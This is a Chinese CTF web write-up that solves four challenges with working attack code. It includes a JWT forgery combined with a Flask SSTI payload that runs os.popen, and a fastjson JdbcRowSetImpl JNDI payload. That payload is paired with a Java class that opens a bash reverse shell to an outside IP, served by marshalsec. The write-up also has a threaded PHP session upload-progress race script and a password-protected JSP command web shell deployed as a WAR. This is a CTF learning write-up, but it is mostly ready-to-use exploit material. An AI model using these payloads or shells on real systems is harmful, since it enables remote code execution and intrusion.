ezpy
#app.py
from flask import Flask, request, render_template, render_template_string, make_response, redirect, Request, url_for
from cookie import *
import uuid
app = Flask(__name__)
@app.route("/")
def index():
return render_template("login.html")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
user = request.form['user']
passwd = request.form['passwd']
payload = {
"user": user,
"passwd": passwd,
"uid": str(uuid.uuid4()),
"role": "guest"
}
response = make_response(redirect(url_for("flag")))
response.set_cookie("token", generate_jwt(payload, "CTf4r"), max_age=1800)
return response
@app.route("/flag")
def flag():
res = verify_jwt(request.cookies.get("token"), "CTf4r")
print(res)
if res['role'] == "admin":
tips = "Hello admin!"
return render_template_string(render_template("res.html", title="Hello "+res["user"], content=tips))
else:
tips = "Sorry, you are not admin!"
return render_template_string(render_template("res.html", title="Permission denied", content=tips))
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=0)
#cookie.py
import jwt
def generate_jwt(payload, key):
return jwt.encode(payload, key=key, algorithm="HS256")
def verify_jwt(mtext, key):
return jwt.decode(mtext, key=key, algorithms=["HS256"])
jwt爆破得:CTf4r
再ssti
url_for.__globals__.os.popen(request.args.a).read()
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoie3t1cmxfZm9yLl9fZ2xvYmFsc19fLm9zLnBvcGVuKHJlcXVlc3QuYXJncy5hKS5yZWFkKCl9fSIsInBhc3N3ZCI6InRlc3QiLCJ1aWQiOiJhOTU0YjczMS01NGFkLTRiMzUtOGUxMS04ZWM2OTcyN2Q3ZTYiLCJyb2xlIjoiYWRtaW4ifQ.expgqWwyhxIXTRDSIbEvMwmtKjUE-DANHW99Ul8la2M
/flag?a=cat flag
soeasy
参考:https://cloud.tencent.com/developer/article/1553664
{
"name":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"x":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://175.24.73.30:9999/Exploit",
"autoCommit":true
}
}
Exploit.java
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"bash","-c","bash -i >& /dev/tcp/175.24.73.30/2333 0>&1"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
javac Exploit.java
python3 -m http.server 8080
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://175.243.30:8080/#Exploit 9999
DaLaBengBa
import io
import sys
import requests
import threading
sessid = 'jan'
sess_path='/tmp'
url='http://f813a9ca.yunyansec.com/'
def WRITE(session):
while True:
f = io.BytesIO(b'x' * 1024 * 50)
session.post(
url=url,
data={"PHP_SESSION_UPLOAD_PROGRESS":f"<?=phpinfo();file_get_contents('flag.php');?>"},
files={"file":('xxx.txt', f)},
cookies={'PHPSESSID':sessid}
)
def READ(session):
while True:
response = session.get(f'{url}?doge[_filename]={sess_path}/sess_{sessid}')
if 'upload_progress_' in response.text:
print(response.text)
sys.exit(0)
else:
print('++++++retry++++++')
def main():
with requests.session() as session:
t1 = threading.Thread(target=WRITE, args=(session,))
t1.daemon = True
t1.start()
READ(session)
if __name__ == '__main__':
main()
Old But A Little New
参考:https://pianshen.com/article/38641854149/
生成war包:jar cvf shell.war shell.jsp
<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>一句话木马</title>
</head>
<body>
<%
if ("admin".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
</body>
</html>
传war包,拿flag
/shell/shell.jsp?pwd=admin&cmd=cat flag
results matching ""
No results matching ""
pwn-栈溢出2ROP返回导向编程(英语:Return-Oriented Programming,缩写:ROP)是计算机安全中的一种漏洞利用技术,该技术允许攻击者在程序启用了安全保护技术(如堆栈不可执行)的情况下控制程序执行流,执行恶意代码[1]。其核心思想是…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论